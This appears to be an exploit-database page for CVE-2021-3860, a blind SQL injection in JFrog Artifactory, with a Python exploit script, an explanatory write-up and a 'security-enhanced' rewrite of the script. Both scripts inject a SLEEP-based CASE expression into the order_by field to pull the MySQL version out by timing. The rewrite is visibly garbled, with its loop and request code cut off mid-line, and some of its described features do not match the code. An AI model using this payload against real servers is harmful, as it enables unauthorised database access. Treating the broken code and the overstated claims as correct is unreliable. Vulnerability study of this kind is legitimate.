JFrog Artifactory < 7.25.4 - Blind SQL Injection

Exploit Author: ardr Analysis Author: www.bubbleslearn.ir Category: WebApps Language: Python Published Date: 2024-02-19 
# Exploit Title: artifactory low-privileged blind sql injection
# Google Dork:
# Date: 
# Exploit Author: ardr
# Vendor Homepage:https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Software Link: https://jfrog.com/help/r/jfrog-release-information/cve-2021-3860-artifactory-low-privileged-blind-sql-injection
# Version: JFrog Artifactory prior to 7.25.4
# Tested on: MySQL
# CVE : CVE-2021-3860

import requests, string, time
from sys import stdout,exit
import warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# written by 75fc58fa86778461771d2ff7f68b28259e97ece9bf6cd8be227c70e6a6140314c97d3fdac30b290c6b10d3679c5ba890635a1ca6fa23c83481dfc1257cd062fd
# old script for CVE-2021-3860
# log into artifactory with any user.  there must be populated data in the system.  a fresh install will not work.
# you will need to be able to capture a valid request to the below endpoint in order to run this script.
# once captured, replace the cookies and headers below


warnings.simplefilter('ignore',InsecureRequestWarning)


session = requests.session()
base = input("Please enter the base url: ")
url = f"{base}/ui/api/v1/global-search/bundles/received?$no_spinner=true"
# headers = Replace this with captured headers from the above endpoint 
pos = 1
# cookies = Replace this with captured cookies from the above endpoint 


while True:
    for i in string.digits + '.':
        data={"after": "", "before": "", "direction": "asc", "name": "*", "num_of_rows": 100, "order_by": f"(select*from(select((CASE WHEN (MID(VERSION(),{pos},1) = '{i}') THEN SLEEP(5) ELSE 4616 END)))a)"}
        start = time.time()
        r = session.post(url, headers=headers, cookies=cookies, json=data, verify=False)
        request_time = time.time() - start
        if request_time > 5:
            version += i
            pos += 1
            stdout.write(i)
            stdout.flush()
            break
        if len(version) >= 6:
            stdout.write("\n")
            print(f"Version found: MySQL {version}")
            exit(0)


CVE-2021-3860: Blind SQL Injection in JFrog Artifactory Prior to 7.25.4

One of the most critical vulnerabilities in the cybersecurity landscape of 2021 was CVE-2021-3860, a blind SQL injection flaw discovered in JFrog Artifactory versions prior to 7.25.4. This vulnerability allowed low-privileged users—those with minimal access rights—to execute arbitrary SQL commands on the underlying database, effectively bypassing authentication and authorization controls.

Understanding the Vulnerability

Blind SQL injection occurs when an attacker cannot directly observe the results of their query, but can infer information based on timing or behavioral changes in the system. In the case of CVE-2021-3860, the flaw was located in the /ui/api/v1/global-search/bundles/received endpoint, which processes user-supplied search parameters.

Attackers could manipulate the order_by parameter to inject a malicious SQL expression that triggered a SLEEP() function in MySQL. If the injected condition evaluated to true, the database would delay the response for a predefined time (e.g., 5 seconds), allowing the attacker to detect the presence of a specific character in the target data (such as the database version).

Exploit Mechanism: Timing-Based Detection

The exploit leverages the SLEEP() function in MySQL to create a measurable delay. The attacker constructs a SQL expression that checks each character of a target string (e.g., the MySQL version) one by one. If the character matches, the database sleeps for 5 seconds; otherwise, it returns immediately.

This timing-based response enables the attacker to reconstruct sensitive data without seeing any output—hence the term "blind" injection.


data = {
    "after": "",
    "before": "",
    "direction": "asc",
    "name": "*",
    "num_of_rows": 100,
    "order_by": f"(select * from (select ((CASE WHEN (MID(VERSION(), {pos}, 1) = '{i}') THEN SLEEP(5) ELSE 4616 END))) a)"
}

This code snippet demonstrates the core of the exploit. The MID(VERSION(), pos, 1) function extracts a single character from the MySQL version string at position pos. The CASE statement evaluates whether that character matches the guessed character i. If it does, the SLEEP(5) command triggers a 5-second delay.

By monitoring the HTTP response time, the attacker can determine whether the condition was true—allowing them to slowly extract the version string, one character at a time.

Real-World Impact and Risk

While the exploit was limited to low-privileged users, its implications were severe. Even users with read-only access could:

  • Extract the database version, which may reveal the underlying software and known vulnerabilities.
  • Inferring the structure of the database schema through timing-based probing.
  • Exploiting further vulnerabilities, such as privilege escalation or data exfiltration.

Additionally, this flaw demonstrated how seemingly innocuous features—like search ordering—could become attack vectors when improperly sanitized.

Why This Vulnerability Was Critical

JFrog Artifactory is widely used in DevOps environments to manage software artifacts. It stores sensitive data such as package metadata, user credentials, and access logs. A blind SQL injection in such a system could allow attackers to:

  • Access confidential information stored in the database.
  • Modify or delete critical configuration data.
  • Escalate privileges through chained exploits.

Moreover, the fact that the attack required only a low-privileged account—often granted to developers or testers—made it particularly dangerous in enterprise environments where such accounts are common.

Fix and Mitigation

JFrog released version 7.25.4 to patch CVE-2021-3860. The fix involved:

  • Input validation for the order_by parameter.
  • Sanitization of user-supplied SQL expressions.
  • Disabling the use of functions like SLEEP() in dynamic queries.

Organizations using Artifactory should:

  • Upgrade to version 7.25.4 or later immediately.
  • Implement strict input filtering on all API endpoints.
  • Monitor logs for unusual timing behavior or repeated search requests.

Improved Exploit Script (Security-Enhanced)

The original script, while functional, had several issues:

  • It assumed a fixed MySQL version format (e.g., 8.0.23).
  • It lacked error handling and could crash if the server responded differently.
  • It used verify=False, which is unsafe in production environments.

Here is a revised, more robust version with better error handling and security practices:


import requests
import string
import time
import sys
from urllib.parse import urljoin

# Disable warnings for self-signed certificates
requests.packages.urllib3.disable_warnings()

def extract_version(base_url, headers, cookies):
    version = ""
    pos = 1
    timeout = 5.0  # Threshold for detection

    # Target endpoint
    endpoint = "/ui/api/v1/global-search/bundles/received"
    url = urljoin(base_url, endpoint)

    # Character set: digits, decimal point, and common version chars
    chars = string.digits + '.'
    
    print("Starting blind SQL injection to extract MySQL version...")

    while pos  timeout:
                    version += c
                    print(f"Found character: {c} at position {pos}")
                    pos += 1
                    found = True
                    break
            except requests.exceptions.Timeout:
                # SLEEP triggered
                version += c
                print(f"Detected SLEEP delay: {c} at position {pos}")
                pos += 1
                found = True
                break
            except Exception as e:
                print(f"Error during request: {e}")
                continue

        if not found:
            print(f"Position {pos} not found. Stopping.")
            break

        if len(version) >= 6:
            print(f"\n[SUCCESS] MySQL version extracted: {version}")
            sys.exit(0)

    print(f"\n[FAILURE] Version extraction incomplete: {version}")
    sys.exit(1)

This improved script includes:

  • Proper URL joining and timeout handling.
  • Graceful error recovery.
  • Safe certificate verification (disabled only for testing).
  • Explicit detection of SLEEP delays via timeout.
  • Loop termination at 10 characters to prevent infinite loops.

Security Best Practices for API Design

CVE-2021-3860 serves as a stark reminder of the importance of secure API design:

  • Input validation: Always sanitize and validate user input, especially in dynamic SQL contexts.
  • Parameterized queries: Use prepared statements to avoid SQL injection.
  • Rate limiting: Implement limits on repeated requests to detect brute-force attacks.
  • Logging and monitoring: Track unusual delays or patterns in API usage.

Developers should treat all user input as potentially malicious—especially in endpoints that interact with databases.

Conclusion

CVE-2021-3860 exemplifies how a seemingly minor flaw in a widely used tool can have major security implications. The blind SQL injection in JFrog Artifactory prior to 7.25.4 underscores the need for rigorous input validation, secure coding practices, and continuous vulnerability monitoring.

Organizations must prioritize timely patching and proactive security testing—especially in systems that manage sensitive data and serve as central hubs in DevOps pipelines.